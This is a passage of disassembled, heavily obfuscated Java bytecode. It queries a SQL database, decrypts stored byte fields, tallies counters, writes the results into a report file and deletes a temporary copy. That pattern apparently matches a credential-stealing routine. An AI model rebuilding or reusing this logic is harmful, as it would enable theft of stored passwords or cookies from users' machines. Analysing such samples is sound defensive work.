       729: invokeinterface #310,  2          // InterfaceMethod java/util/Map.containsKey:(Ljava/lang/Object;)Z
       734: ifeq          786
       737: aload         15
       739: ldc           #20                 // int 964937340
       741: sipush        7807
       744: isub
       745: ldc           #20                 // int 964937340
       747: sipush        7556
       750: iadd
       751: lload         5
       753: l2i
       754: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       757: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       760: aload         16
       762: aload         14
       764: iconst_1
       765: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       770: invokeinterface #141,  2          // InterfaceMethod java/util/Map.get:(Ljava/lang/Object;)Ljava/lang/Object;
       775: checkcast     #157                // class java/lang/String
       778: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       781: pop
       782: goto          786
       785: athrow
       786: aload         15
       788: ldc           #20                 // int 964937340
       790: sipush        7862
       793: isub
       794: ldc           #20                 // int 964937340
       796: sipush        5791
       799: isub
       800: lload         5
       802: l2i
       803: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       806: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       809: pop
       810: iload         9
       812: ifeq          529
       815: iload         9
       817: lload         5
       819: lconst_0
       820: lcmp
       821: iflt          2069
       824: lload         5
       826: lconst_0
       827: lcmp
       828: ifle          836
       831: ifeq          1771
       834: iload         8
       836: iload         9
       838: ifne          1160
       841: goto          845
       844: athrow
       845: iconst_4
       846: goto          850
       849: athrow
       850: if_icmpne     1149
       853: new           #62                 // class java/text/SimpleDateFormat
       856: dup
       857: ldc           #20                 // int 964937340
       859: sipush        7819
       862: isub
       863: ldc           #20                 // int 964937340
       865: sipush        12378
       868: iadd
       869: lload         5
       871: l2i
       872: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       875: invokespecial #87                 // Method java/text/SimpleDateFormat."<init>":(Ljava/lang/String;)V
       878: astore        16
       880: aload         14
       882: invokeinterface #140,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       887: ifeq          1130
       890: aload         14
       892: iconst_4
       893: invokeinterface #33,  2           // InterfaceMethod java/sql/ResultSet.getLong:(I)J
       898: lstore        17
       900: lload         17
       902: lconst_0
       903: lcmp
       904: iload         9
       906: ifne          1783
       909: ifle          960
       912: goto          916
       915: athrow
       916: aload         16
       918: new           #223                // class java/util/Date
       921: dup
       922: lload         17
       924: sipush        6236
       927: ldc2_w        #382                // long 3936422842002419382l
       930: lload         5
       932: lxor
       933: invokestatic  #321                // Method a:(IJ)J
       936: ldiv
       937: sipush        17026
       940: ldc2_w        #376                // long 2284978161961399401l
       943: lload         5
       945: lxor
       946: invokestatic  #321                // Method a:(IJ)J
       949: lsub
       950: invokespecial #288                // Method java/util/Date."<init>":(J)V
       953: invokevirtual #300                // Method java/text/SimpleDateFormat.format:(Ljava/util/Date;)Ljava/lang/String;
       956: goto          978
       959: athrow
       960: ldc           #20                 // int 964937340
       962: sipush        7832
       965: isub
       966: ldc           #20                 // int 964937340
       968: sipush        5402
       971: isub
       972: lload         5
       974: l2i
       975: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       978: astore        19
       980: aload         15
       982: ldc           #20                 // int 964937340
       984: sipush        7841
       987: isub
       988: ldc           #4                  // int -964937340
       990: sipush        -1283
       993: iadd
       994: lload         5
       996: l2i
       997: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1000: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1003: aload         14
      1005: iconst_1
      1006: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1011: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1014: ldc           #20                 // int 964937340
      1016: sipush        7860
      1019: isub
      1020: ldc           #20                 // int 964937340
      1022: sipush        10804
      1025: isub
      1026: lload         5
      1028: l2i
      1029: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1032: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1035: aload         14
      1037: iconst_2
      1038: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1043: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1046: ldc           #20                 // int 964937340
      1048: sipush        7863
      1051: isub
      1052: ldc           #20                 // int 964937340
      1054: sipush        6047
      1057: iadd
      1058: lload         5
      1060: l2i
      1061: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1064: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1067: aload         14
      1069: iconst_3
      1070: invokeinterface #166,  2          // InterfaceMethod java/sql/ResultSet.getInt:(I)I
      1075: invokevirtual #286                // Method java/lang/StringBuilder.append:(I)Ljava/lang/StringBuilder;
      1078: ldc           #20                 // int 964937340
      1080: sipush        7806
      1083: isub
      1084: ldc           #20                 // int 964937340
      1086: bipush        93
      1088: iadd
      1089: lload         5
      1091: l2i
      1092: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1095: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1098: aload         19
      1100: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1103: ldc           #20                 // int 964937340
      1105: sipush        7850
      1108: isub
      1109: ldc           #20                 // int 964937340
      1111: sipush        5312
      1114: iadd
      1115: lload         5
      1117: l2i
      1118: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1121: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1124: pop
      1125: iload         9
      1127: ifeq          880
      1130: iload         9
      1132: lload         5
      1134: lconst_0
      1135: lcmp
      1136: iflt          1783
      1139: lload         5
      1141: lconst_0
      1142: lcmp
      1143: ifle          1156
      1146: ifeq          1771
      1149: aload         14
      1151: invokeinterface #140,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
      1156: goto          1160
      1159: athrow
      1160: ifeq          1771
      1163: iload         8
      1165: lload         5
      1167: lconst_0
      1168: lcmp
      1169: ifle          1783
      1172: iload         9
      1174: ifne          1783
      1177: iconst_1
      1178: iload         9
      1180: lload         5
      1182: lconst_0
      1183: lcmp
      1184: iflt          1379
      1187: ifne          1377
      1190: goto          1194
      1193: athrow
      1194: if_icmpne     1374
      1197: goto          1201
      1200: athrow
      1201: aload         14
      1203: iconst_3
      1204: invokeinterface #148,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1209: invokestatic  #359                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
      1212: astore        16
      1214: aload         16
      1216: lload         5
      1218: lconst_0
      1219: lcmp
      1220: iflt          1237
      1223: iload         9
      1225: ifne          1237
      1228: ifnull        1362
      1231: goto          1235
      1234: athrow
      1235: aload         16
      1237: invokevirtual #253                // Method java/lang/String.isEmpty:()Z
      1240: iload         9
      1242: ifne          1261
      1245: ifne          1362
      1248: goto          1252
      1251: athrow
      1252: getstatic     #150                // Field f:I
      1255: iconst_1
      1256: iadd
      1257: goto          1261
      1260: athrow
      1261: putstatic     #150                // Field f:I
      1264: aload         15
      1266: ldc           #20                 // int 964937340
      1268: sipush        7816
      1271: isub
      1272: ldc           #20                 // int 964937340
      1274: sipush        11391
      1277: isub
      1278: lload         5
      1280: l2i
      1281: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1284: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1287: aload         14
      1289: iconst_1
      1290: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1295: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1298: ldc           #13                 // String \n
      1300: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1303: aload         14
      1305: iconst_2
      1306: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1311: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1314: ldc           #20                 // int 964937340
      1316: sipush        7814
      1319: isub
      1320: ldc           #4                  // int -964937340
      1322: sipush        -1989
      1325: iadd
      1326: lload         5
      1328: l2i
      1329: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1332: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1335: aload         16
      1337: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1340: ldc           #20                 // int 964937340
      1342: sipush        7850
      1345: isub
      1346: ldc           #20                 // int 964937340
      1348: sipush        5312
      1351: iadd
      1352: lload         5
      1354: l2i
      1355: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1358: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1361: pop
      1362: iload         9
      1364: lload         5
      1366: lconst_0
      1367: lcmp
      1368: iflt          1376
      1371: ifeq          1149
      1374: iload         8
      1376: iconst_2
      1377: iload         9
      1379: ifne          1642
      1382: if_icmpne     1634
      1385: goto          1389
      1388: athrow
      1389: aload         14
      1391: iconst_5
      1392: invokeinterface #148,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1397: aload         14
      1399: iconst_1
      1400: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1405: invokestatic  #294                // Method a/b/d/dec.k3l:([BLjava/lang/String;)Ljava/lang/String;
      1408: astore        16
      1410: lload         5
      1412: lconst_0
      1413: lcmp
      1414: ifle          1443
      1417: iload         9
      1419: ifne          1443
      1422: aload         16
      1424: ifnull        1622
      1427: goto          1431
      1430: athrow
      1431: getstatic     #211                // Field c:I
      1434: iconst_1
      1435: iadd
      1436: putstatic     #211                // Field c:I
      1439: goto          1443
      1442: athrow
      1443: aload         15
      1445: aload         14
      1447: iconst_1
      1448: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1453: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1456: ldc           #20                 // int 964937340
      1458: sipush        7851
      1461: isub
      1462: ldc           #4                  // int -964937340
      1464: sipush        -10982
      1467: isub
      1468: lload         5
      1470: l2i
      1471: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1474: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1477: aload         14
      1479: iconst_3
      1480: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1485: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1488: lload         5
      1490: lconst_0
      1491: lcmp
      1492: iflt          1505
      1495: ldc           #1                  // String \t
      1497: iload         9
      1499: ifne          1550
      1502: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1505: aload         14
      1507: iconst_4
      1508: invokeinterface #166,  2          // InterfaceMethod java/sql/ResultSet.getInt:(I)I
      1513: iconst_1
      1514: lload         5
      1516: lconst_0
      1517: lcmp
      1518: iflt          1565
      1521: if_icmpne     1553
      1524: goto          1528
      1527: athrow
      1528: ldc           #20                 // int 964937340
      1530: sipush        7805
      1533: isub
      1534: ldc           #20                 // int 964937340
      1536: sipush        1188
      1539: isub
      1540: lload         5
      1542: l2i
      1543: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1546: goto          1550
      1549: athrow
      1550: goto          1571
      1553: ldc           #20                 // int 964937340
      1555: sipush        7829
      1558: isub
      1559: ldc           #20                 // int 964937340
      1561: sipush        9473
      1564: iadd
      1565: lload         5
      1567: l2i
      1568: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1571: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1574: ldc           #20                 // int 964937340
      1576: sipush        7858
      1579: isub
      1580: ldc           #4                  // int -964937340
      1582: sipush        -10185
      1585: isub
      1586: lload         5
      1588: l2i
      1589: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1592: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1595: aload         14
      1597: iconst_2
      1598: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1603: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1606: ldc           #1                  // String \t
      1608: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1611: aload         16
      1613: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1616: ldc           #13                 // String \n
      1618: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1621: pop
      1622: iload         9
      1624: lload         5
      1626: lconst_0
      1627: lcmp
      1628: iflt          1636
      1631: ifeq          1149
      1634: iload         8
      1636: iload         9
      1638: ifne          1160
      1641: iconst_3
      1642: if_icmpne     1149
      1645: aload         14
      1647: iconst_2
      1648: invokeinterface #148,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1653: invokestatic  #359                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
      1656: astore        16
      1658: iload         9
      1660: ifne          1684
      1663: aload         16
      1665: ifnull        1766
      1668: goto          1672
      1671: athrow
      1672: getstatic     #65                 // Field U:I
      1675: iconst_1
      1676: iadd
      1677: putstatic     #65                 // Field U:I
      1680: goto          1684
      1683: athrow
      1684: aload         15
      1686: ldc           #20                 // int 964937340
      1688: sipush        7808
      1691: isub
      1692: ldc           #4                  // int -964937340
      1694: sipush        -881
      1697: iadd
      1698: lload         5
      1700: l2i
      1701: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1704: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1707: aload         14
      1709: iconst_1
      1710: invokeinterface #283,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1715: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1718: ldc           #20                 // int 964937340
      1720: sipush        7859
      1723: isub
      1724: ldc           #4                  // int -964937340
      1726: sipush        -5220
      1729: isub
      1730: lload         5
      1732: l2i
      1733: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1736: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1739: aload         16
      1741: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1744: ldc           #20                 // int 964937340
      1746: sipush        7850
      1749: isub
      1750: ldc           #20                 // int 964937340
      1752: sipush        5312
      1755: iadd
      1756: lload         5
      1758: l2i
      1759: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1762: invokevirtual #257                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1765: pop
      1766: iload         9
      1768: ifeq          1149
      1771: lload         5
      1773: lconst_0
      1774: lcmp
      1775: iflt          1163
      1778: aload         15
      1780: invokevirtual #258                // Method java/lang/StringBuilder.length:()I
      1783: ifle          1836
      1786: aload         4
      1788: aload         7
      1790: ldc           #20                 // int 964937340
      1792: sipush        7868
      1795: isub
      1796: ldc           #4                  // int -964937340
      1798: sipush        -4052
      1801: iadd
      1802: lload         5
      1804: l2i
      1805: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
      1808: dup_x2
      1809: pop
      1810: ldc           #11                 // String /
      1812: swap
      1813: invokedynamic #66,  0             // InvokeDynamic #2:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
      1818: goto          1822
      1821: athrow
      1822: aload         15
      1824: invokevirtual #30                 // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
      1827: getstatic     #301                // Field java/nio/charset/StandardCharsets.UTF_8:Ljava/nio/charset/Charset;
      1830: invokevirtual #328                // Method java/lang/String.getBytes:(Ljava/nio/charset/Charset;)[B
      1833: invokestatic  #72                 // Method a/b/c/z.a:(Ljava/lang/String;[B)V
      1836: lload         5
      1838: lconst_0
      1839: lcmp
      1840: ifle          1864
      1843: aload         14
      1845: iload         9
      1847: ifne          1859
      1850: ifnull        1912
      1853: goto          1857
      1856: athrow
      1857: aload         14
      1859: invokeinterface #122,  1          // InterfaceMethod java/sql/ResultSet.close:()V
      1864: goto          1912
      1867: astore        15
      1869: lload         5
      1871: lconst_0
      1872: lcmp
      1873: iflt          1897
      1876: aload         14
      1878: iload         9
      1880: ifne          1892
      1883: ifnull        1909
      1886: goto          1890
      1889: athrow
      1890: aload         14
      1892: invokeinterface #122,  1          // InterfaceMethod java/sql/ResultSet.close:()V
      1897: goto          1909
      1900: astore        16
      1902: aload         15
      1904: aload         16
      1906: invokevirtual #358                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1909: aload         15
      1911: athrow
      1912: lload         5
      1914: lconst_0
      1915: lcmp
      1916: iflt          1940
      1919: aload         13
      1921: iload         9
      1923: ifne          1935
      1926: ifnull        1988
      1929: goto          1933
      1932: athrow
      1933: aload         13
      1935: invokeinterface #201,  1          // InterfaceMethod java/sql/Statement.close:()V
      1940: goto          1988
      1943: astore        14
      1945: lload         5
      1947: lconst_0
      1948: lcmp
      1949: ifle          1973
      1952: aload         13
      1954: iload         9
      1956: ifne          1968
      1959: ifnull        1985
      1962: goto          1966
      1965: athrow
      1966: aload         13
      1968: invokeinterface #201,  1          // InterfaceMethod java/sql/Statement.close:()V
      1973: goto          1985
      1976: astore        15
      1978: aload         14
      1980: aload         15
      1982: invokevirtual #358                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1985: aload         14
      1987: athrow
      1988: lload         5
      1990: lconst_0
      1991: lcmp
      1992: ifle          2016
      1995: aload         12
      1997: iload         9
      1999: ifne          2011
      2002: ifnull        2064
      2005: goto          2009
      2008: athrow
      2009: aload         12
      2011: invokeinterface #334,  1          // InterfaceMethod java/sql/Connection.close:()V
      2016: goto          2064
      2019: astore        13
      2021: lload         5
      2023: lconst_0
      2024: lcmp
      2025: iflt          2049
      2028: aload         12
      2030: iload         9
      2032: ifne          2044
      2035: ifnull        2061
      2038: goto          2042
      2041: athrow
      2042: aload         12
      2044: invokeinterface #334,  1          // InterfaceMethod java/sql/Connection.close:()V
      2049: goto          2061
      2052: astore        14
      2054: aload         13
      2056: aload         14
      2058: invokevirtual #358                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      2061: aload         13
      2063: athrow
      2064: aload         11
      2066: invokevirtual #228                // Method java/io/File.delete:()Z
      2069: pop
      2070: goto          2095
      2073: astore        12
      2075: aload         11
      2077: invokevirtual #228                // Method java/io/File.delete:()Z
      2080: pop
      2081: goto          2095
      2084: astore        20
      2086: aload         11
      2088: invokevirtual #228                // Method java/io/File.delete:()Z
      2091: pop
      2092: aload         20
      2094: athrow
      2095: return
      Exception table:
         from    to  target type
           407   431   434   Class java/lang/Throwable
           398   410   413   Class java/lang/Throwable
           384   403   406   Class java/lang/Throwable
           142   152   155   Class java/lang/Throwable
            95   110   113   Class java/lang/Throwable
            88   102   105   Class java/lang/Throwable
            78    91    94   Class java/lang/Throwable
           361   441   479   Class java/lang/Throwable
           502   509   512   Class java/lang/Throwable
           481   498   501   Class java/lang/Throwable
           441   465   468   Class java/lang/Throwable
           329   524   527   Class java/lang/Exception
          1783  1818  1821   Class java/lang/Throwable
          1663  1680  1683   Class java/lang/Throwable
          1658  1668  1671   Class java/lang/Throwable
          1502  1546  1549   Class java/lang/Throwable
          1443  1524  1527   Class java/lang/Throwable
          1422  1439  1442   Class java/lang/Throwable
          1410  1427  1430   Class java/lang/Throwable
          1377  1385  1388   Class java/lang/Throwable
          1245  1257  1260   Class java/lang/Throwable
          1237  1248  1251   Class java/lang/Throwable
          1214  1231  1234   Class java/lang/Throwable
          1177  1197  1200   Class java/lang/Throwable
          1163  1190  1193   Class java/lang/Throwable
          1130  1156  1159   Class java/lang/Throwable
           909   959   959   Class java/lang/Throwable
           900   912   915   Class java/lang/Throwable
           834   846   849   Class java/lang/Throwable
           815   841   844   Class java/lang/Throwable
           712   782   785   Class java/lang/Throwable
           582   708   711   Class java/lang/Throwable
           575   703   706   Class java/lang/Throwable
           564   578   581   Class java/lang/Throwable
           552   571   574   Class java/lang/Throwable
           305   316   319   Class java/lang/Throwable
           296  1836  1867   Class java/lang/Throwable
          1890  1897  1900   Class java/lang/Throwable
          1869  1886  1889   Class java/lang/Throwable
          1836  1853  1856   Class java/lang/Throwable
           286  1912  1943   Class java/lang/Throwable
          1966  1973  1976   Class java/lang/Throwable
          1945  1962  1965   Class java/lang/Throwable
          1912  1929  1932   Class java/lang/Throwable
           277  1988  2019   Class java/lang/Throwable
          2042  2049  2052   Class java/lang/Throwable
           196   236  2073   Class java/lang/Exception
          2021  2038  2041   Class java/lang/Throwable
          1988  2005  2008   Class java/lang/Throwable
           243  2064  2073   Class java/lang/Exception
           196   236  2084   any
           243  2064  2084   any
          2073  2075  2084   any
          2084  2086  2084   any

  static {};
    Code:
         0: ldc2_w        #372                // long 803545067211l
         3: lstore        6
         5: bipush        57
         7: anewarray     #157                // class java/lang/String
        10: astore        13
        12: iconst_0
        13: istore        11
        15: ldc           #16                 // String \u0085¨\u000e¥\u001f©Ë_Ü\u001c~§\u0005zøÙö\u0007WhâàKþ-\u0006\u0002ýv0oq\b\u0006ßµKÖ\u0003oÇ\nþ°1ù?Ús\u0091\u0004R\u0011\u0004õ\f_\u0093\u0084À\u0095\u0086§ÞY½ó\u0094Ó&\u0006Ç\u0018í\r\u0010Çs¨§,Xÿ3\u0087Ps¤Õ\u0000ó´´\u008aòÊ\u0004\u0002.\u000fÂÐuöça/G·à/Õ² ®\u0085\u001f\u0097ÌwÝê²\u0095ö\u008a³Ò\u0081^\u0010¢©ú`\\w4s\u001b÷\u0089T@\u009fI>\'aUæoîÕ\u000bi%8zQ\u001f/ \u0015S8\u007f/ë#Ô@Ûsu7kBà\u0019f%éA·Än\u007fÕIHÒ\n(:£¬×ÎÜ\r³Ô\u009cI½/ò\n\u0090ÜF;Ò±ýw\u0004ë¸[ÃC\r\u0083\u0002+f\u0086\u008c\u001bnEÔ\u0006¼ÿèf¬\u0013.kýT\u0013ðZft[\fG\u0091\u0080«úß.î\u0091\u0010\u0095µä\u0001\u0010«Ê}¾8\u001c\u008cUZ¯\u0005rjÏàAÛ;Bíd\fWÖ 9\u009f\u008e\u0015gn»Q£\u0007½\bÉ5·¯~\tËo\u000b\u0003$D«ô»\u000b\u009a¬uÉò$*\u0090Îw\u0092\bºXÄæ\u000e\u0018\n KæWåFÆð  \u0090£M¥ÍÜà\u008fçåÁá\u001c\r>J\u009e{z\u0083\u007fwwÒ\u0096,Hà¾(îèò\"Ü¨½c \u000b\u0004p\u0087\u0096Ìªã®\u0084N§¥M²Uó2D\u0083!wß*¯â\u0014\u0097\u0010\u0006\u0007é¯0\u0088\u001a$\u0082\u0096öwUÌÂ¤\u0007Ô\u0089ãokª?\u0002\u0088Ö\f´$\u009f\u000b\u001b\u009c\u001cmgtÉ²Raä\u00150Ø>cþõ\u0085L\u000e\u0099cÃ[B¨ñZe(\u0097\u0090³äÒ9\u00905\t¹³g{ßÀ\t\f4ê\u0090ªý\b\u0000¾+u\u009c0ý\u0019Ý4VÜÌï\u0019ú*[\u0083ÂT\u0019ñ-g`H\u0081XJ\rqN\u0015nÅ\u0006\tY\u0090Eùy×kµ\u0082\f\u0004³Ñ?bMÙ\u0086\fü\u0001ù\u0006Â£Mz\u0004)\bÅ#ÖÊ\u000eGi\u008e\b\u000eW§\u001e0Æ\u0094¾\n\u008eÛ?\u0094þwK$\u0003ä\u0007Òç¼P´ªJ\u0007\'\u009fÈ\u001e\u000e!\u0085\u000bc dù\u009bÝ7Ó]¥!\u0007\u0083\u008ex<\u0018eG@\u008eðè²gn\u0094û\u0011Ñ\u0099®zL¥#Åqìã:Ë\u0011±\u008a\u0010z ¶\u008a¸Nu¡tÌ\u0015®Îlßq^¶ñ\u0013\u0097e\thq¢Iº:äºÆü\u0084õ\u009a\u000f°\u000få/\u0003_\t\u0081»ßà\u000f\\ôá\u008e\u0084\u0013kã\u000eWFp~H\u009d©\u007fi\u0002%ãfÊ{«\u0003\u001deë\u0018\u0083å\u0084x\u0089`¬>Í4äpL\u009a\u009a\u001d»=äÏ\u00973\u0098\u0006#å©W\u0096±ôâ¶)<ö©ØpôÀ\u0003LÀ\u0093ÎÕ\u0098\u0001\u0016\u0018ä×´\u008f}Rôl}\túyJ\u0002ú\u0007Eüô\nïÙÌ54À\u001b;\"\u0087\n H5\u0007\u000b\u0086üóÞ\u009e)¨\u0010þ¡\u0084\u0012Djý§lÚ\u008b\u001e\u009e\rNõi¤û3>ÝÂ\u0083~¤çá\u0017\u009f¹ÕÔáb\u009a`Ud\rc\u0002=ðçtm)í¦Ð»\u0015\u0007v\u0005¨\u001cÁÂ¢\u0004ð7Ù¿\u0007ik\u008aA\u0000r»\u0006{\u001e>¯\u009d\u007f\u0010,\u0016¬\u008d\u0098Ì\u000f¬ \u0087¢Uß\u0088\u0093,\u000bIaW\u0018d\n\u0004ÜpD\u0084\u000f»ìÈ\'p\u008e\u0094>\u00053àsv~vb\u0095K\u008bÅ\u000b\u0080\u00194§}à\u0092@l\twò\'KºW\u0013\u0015G½\u008dí¸Þj\u0018\u0093:¶¦`DÌQ®\u0086ÏD¥\u0019\'þ\u0085#Iw0lkZ©\u008b&o¶ó\n\u0093\u0003úQqÈêøë\u008f½(\u0080©\n¡\u001d¥0igÓ\u00027¢ûÏ\u0093\u0002Ô\"\u0096¯:S2\u0006<\u0016M-°\u0013\u0005\u008a7ßØ\u0087\u0003ÒLÐ
        17: dup
        18: astore        10
        20: invokevirtual #76                 // Method java/lang/String.length:()I
        23: istore        12
        25: iconst_2
        26: istore        9
        28: iconst_m1
        29: istore        8
        31: iinc          8, 1
        34: aload         10
        36: iload         8
        38: dup
        39: iload         9
        41: iadd
        42: invokevirtual #134                // Method java/lang/String.substring:(II)Ljava/lang/String;
        45: iconst_m1
        46: goto          183
        49: aload         13
        51: swap
        52: iload         11
        54: iinc          11, 1
        57: swap
        58: aastore
        59: iload         8
        61: iload         9
        63: iadd
        64: dup
        65: istore        8
        67: iload         12
        69: if_icmpge     84
        72: aload         10
        74: iload         8
        76: invokevirtual #315                // Method java/lang/String.charAt:(I)C
        79: istore        9
        81: goto          31
        84: ldc           #5                  // String \u001dQÆ\u0010NñQW·`\u009bc|\bWuyC¹¬ü6
        86: dup
        87: astore        10
        89: invokevirtual #76                 // Method java/lang/String.length:()I
        92: istore        12
        94: bipush        13
        96: istore        9
        98: iconst_m1
        99: istore        8
       101: iinc          8, 1
       104: aload         10
       106: iload         8
       108: dup
       109: iload         9
       111: iadd
       112: invokevirtual #134                // Method java/lang/String.substring:(II)Ljava/lang/String;
       115: iconst_0
       116: goto          183
       119: aload         13
       121: swap
       122: iload         11
       124: iinc          11, 1
       127: swap
       128: aastore
       129: iload         8
       131: iload         9
       133: iadd
       134: dup
       135: istore        8
       137: iload         12
       139: if_icmpge     154
       142: aload         10
       144: iload         8
       146: invokevirtual #315                // Method java/lang/String.charAt:(I)C
       149: istore        9
       151: goto          101
       154: aload         13
       156: putstatic     #248                // Field a:[Ljava/lang/String;
       159: bipush        57
       161: anewarray     #157                // class java/lang/String
       164: putstatic     #91                 // Field b:[Ljava/lang/String;
       167: ldc           #17                 // int -386180596
       169: ldc           #3                  // int 386197693
       171: lload         6
       173: l2i
       174: invokestatic  #34                 // Method a:(III)Ljava/lang/String;
       177: putstatic     #185                // Field w:Ljava/lang/String;
       180: goto          336
       183: swap
       184: invokevirtual #202                // Method java/lang/String.toCharArray:()[C
       187: dup
       188: arraylength
       189: swap
       190: iconst_0
       191: istore        14
       193: swap
       194: dup_x1
       195: iconst_1
       196: if_icmpgt     295
       199: dup
       200: iload         14
       202: dup2
       203: caload
       204: iload         14
       206: bipush        7
       208: irem
       209: tableswitch   { // 0 to 5
                       0: 248
                       1: 252
                       2: 257
                       3: 262
                       4: 267
                       5: 272
                 default: 277
            }
       248: iconst_3
       249: goto          279
       252: bipush        89
       254: goto          279
       257: bipush        44
       259: goto          279
       262: bipush        47
       264: goto          279
       267: bipush        121
       269: goto          279
       272: bipush        100
       274: goto          279
       277: bipush        92
       279: ixor
       280: i2c
       281: castore
       282: iinc          14, 1
       285: swap
       286: dup_x1
       287: ifne          295
       290: dup2
       291: swap
       292: goto          202
       295: swap
       296: dup_x1
       297: iload         14
       299: if_icmpgt     199
       302: new           #157                // class java/lang/String
       305: dup_x1
       306: swap
       307: invokespecial #217                // Method java/lang/String."<init>":([C)V
